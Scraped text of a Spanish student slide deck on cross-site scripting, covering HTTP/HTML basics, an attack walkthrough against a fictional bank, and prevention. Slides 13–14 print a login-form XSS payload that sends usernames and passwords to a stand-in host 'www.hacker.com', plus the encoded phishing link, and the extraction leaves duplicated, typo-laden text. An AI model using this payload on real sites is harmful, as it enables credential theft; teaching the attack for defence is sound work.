ARE YOUR WEB VULNERABLE?

Tamaño: px

Comenzar la demostración a partir de la página:

Download "ARE YOUR WEB VULNERABLE?"

José Francisco Molina Villalobos
hace 8 años
Vistas:

1 CROSS-SITE SITE SCRIPTING: ARE YOUR WEB APPLICATIONS VULNERABLE? Alberto Calle Alonso Sebastián Marcos Miguel Mateo de la Puente Madrid, Febrero

2 ÍNDICE Introducción Cross-site scripting HTTP y HTML Ataque avanzado con XSS Métodos de prevención 2 2

3 Introducción Cross-site scripting: Consiste en enmascarar el origen de la dirección web objetivo de tal manera que el atacante consigue un acceso completo a dicha web pudiendo enviar datos e información confidencial a su propio servidor. Este agujero de seguridad también es conocido como XSS. Se utiliza para obtener información de formularios. Ejemplo: Recibimos un mail con una supuesta promoción para la cual se necesitan introducir los datos de la tarjeta de crédito, datos que quedan a disposición del atacante. 3 3

Este agujero de seguridad también es conocido como XSS. Se utiliza para obtener información de formularios.

4 Cross-site site Scripting Ocurre cuando se genera una página web dinámica que contiene una entrada de datos cuya validación no es la correcta. Esto permite que el atacante inserte JavaDcript malicioso dentro del código de generación de la página para ejecutarlo en las má quinas de aquellos usuarios que accedan a ellas. Afecta a cualquier página que requiera una validación de datos para acceder a ciertos servicios aunque se ven especialmente afectados los motores de búsqueda y los formularios que hay que el usuario rellena manualmente. 4 4

Esto permite que el atacante inserte JavaDcript malicioso dentro del código de generación de la página para ejecutarlo en las má quinas

5 Cross-site Scripting Un ataque de XSS, ejecutado de manera correcta, permite: 1. Comprometer la confidencialidad de la información. 2. Ejecutar código malicioso sin que el usuario del recurso web pueda notificarlo. 3. Manipular o robar cookies. 4. Crear respuestas erróneas para usuarios validos. Por lo tanto y al tener una relación con el servicio de paquetes web y el buscador web de los usuarios, es necesario tener unas nociones de HTTP y HTML. 5 5

Ejecutar código malicioso sin que el usuario del recurso web pueda notificarlo. 3. Manipular o robar cookies. 4.

6 HTTP (Hiper Text Transfer Protocol) Es el protocolo más utilizado para la transferencia y recepción de documentos HTML a través de World Wide Web (WWW). El aspecto más importante t de este protocolo es como manejan los servidores las peticiones de los usuarios/clientes, estableciendo una conexión cliente-servidor: Cuando nuestro buscador se conecta a la red se convierte en un cliente que realiza peticiones a los servidores. Éstos se dedican a contestar todas las peticiones que les llegan. 6 6

El aspecto más importante t de este protocolo es como manejan los servidores las peticiones de los usuarios/clientes,

7 HTTP (Hiper Text Transfer Protocol) En este momento se establece una conexión no estable que termina al enviarse la respuesta. Es decir, que aunque un mismo usuario realice varias consultas, estas son tratadas y respondidas independientemente, sin conseguir estabilidad en la conexión en ningún momento. Por este motivo, los ataques XSS tienen éxito, ya que una vez el servidor ha aceptado la petición y ha generado, de manera dinámica, la pagina web con la respuesta (afectada por el script malicioso) ya es demasiado tarde y, potencialmente, el daño ya esta hecho. 7 7

8 HTML (HiperText Makeup Language) Los documentos HTML son documentos de texto plano que contienen únicamente caracteres ASCII de 7 bits imprimibles. Siguen una notación basada etiquetas. Et Estas etiquetas t son interpretadas it td por el lbuscador, el cual realiza las acciones sobre el texto que se encuentra dentro de ellas. Ejemplo de documento HTML: <html> <body> <p>example of HTML document</p> <script> alert("html Document") </script> </body> </html> 8 8

Et Estas etiquetas t son interpretadas it td por el lbuscador, el cual realiza las acciones sobre el texto que se

9 Ataque avanzado con XSS Gran parte de las paginas web permiten a sus usuarios introducir datos para posteriormente recibir una actualización dinámica del contenido de la web basada en la entrada introducida. Por ejemplo, si se introduce en un buscador asdfghjkl como criterio de búsqueda, el servidor devuelve una página que informa de que la entrada es inválida. Esto parece ser inofensivo, pero si el buscador devuelve Nothing is found for <script>alert('aaa')</script>. éste puede interpretar que se lanza una función de alerta (con todas sus consecuencias) y, por lo tanto, el sistema puede estar en riesgo. 9 9

Por ejemplo, si se introduce en un buscador asdfghjkl como criterio de búsqueda, el servidor devuelve una página que informa de que la entrada es

10 Ataque avanzado con XSS Ejemplo: FREEBANK - Se crea una página del banco Freebank y un servidor Web que recibe información obtenida durante un ataque exitoso. - El atacante busca páginas web que devuelvan información del usuario. - En este caso, el atacante encuentra información cuando el intento de identificación falla. CONTRASEÑA MAL INTRODICIDA La página muestra el nombre de usuario introducido. - El atacante sabe que se devuelve info en la página de LogIn. - Además este error se refleja en la barra de direcciones: - Invalid Login: muestra que no hay información de conexión para BadLogin - En este punto, el atacante sólo tiene que insertar su código HTML malicioso y suplantar la página web

CONTRASEÑA MAL INTRODICIDA La página www.freebank.com muestra el nombre de usuario introducido. - El atacante sabe que se devuelve info en la página de LogIn.

11 Ataque avanzado con XSS 11 11

12 Ataque avanzado con XSS El atacante introduce en el nombre de usuario a line of script (sentencia de código). Afecta al código de salida de la pagina web cambiando err=invalid: Login: BadLogin to err=<script>alet('xss')</script> Si la pagina web es vulnerable, aparece el siguiente i recuadro: 12 12

Afecta al código de salida de la pagina web cambiando err=invalid: Login:

13 Ataque avanzado con XSS En este momento, el atacante sabe de la vulnerabilidad y sólo le queda atacar inyectando su código malicioso, con la intención de robar el usuario y la contraseña. El código inyectado será algo así: <TABLE> <TR> <TD BGCOLOR="#2E7AA3" STYLE="border: 1px solid black" WIDTH="258" HEIGHT="217"> <FORM ACTION="login1.asp" METHOD="post"> <CENTER></form> <form action= login1.asp method= post onsubmit= XSSimage = new Image; XSSimage.src= + document.forms(1).login.value + : + document.forms(1).password.value; > <br>username:<br><input TYPE="text" NAME="login" STYLE="border: 1px solid black; spacing: 0"><BR>Password:<BR> <INPUT TYPE="password Código modificado con intenciones de robar la contraseña y el usuario

asp" METHOD="post"> <CENTER></form> <form action= login1.asp method= post onsubmit= XSSimage = new Image; XSSimage.src= http://www.hacker.com/ + document.forms(1).login.value + : + document.

14 Ataque avanzado con XSS Tras esto, solo le queda añadirlo a la página web de la siguiente manera y esperar a las posibles víctimas: tename=prod_sel.forte&source=freebank&ad_referring_url= k.com&err=%3c/form%3e%3cform%20action=%22login1.asp%22%20method=%22po p st%22%20onsubmit=%22xssimage%20=%20new%20image;xssimage.src=' w.hacker.com/'%20%2b%20document.forms(1).login.value%20%2b%20':'%20%2b%20 document.forms(1).password.value;%22%3e Ahora, por ejemplo, puede enviar mails a los clientes del banco haciendo que estos hagan click en el link malicioso: 14 14

asp%22%20method=%22po p st%22%20onsubmit=%22xssimage%20=%20new%20image;xssimage.src='http://ww w.hacker.com/'%20%2b%20document.forms(1).login.

15 Métodos de prevención Validar los datos introducidos: Consiste en limitar los parámetros que podemos introducir en el campo que estemos usando, es decir limitarlo al uso a letras y números, permitiendo unicamente en el . Validar los datos de respuesta/salida: Es decir, crear un filtro y validar los datos de respuesta antes de devolverlos al usuario. Utilizar Bowsers : - Actualizar las vulnerabilidades bowsers que pueda tener nuestra página web e instalar parches. - Utilizar aplicaciones como HP WebInspect software para testear las posibles vulnerabilidades de nuestras aplicaciones web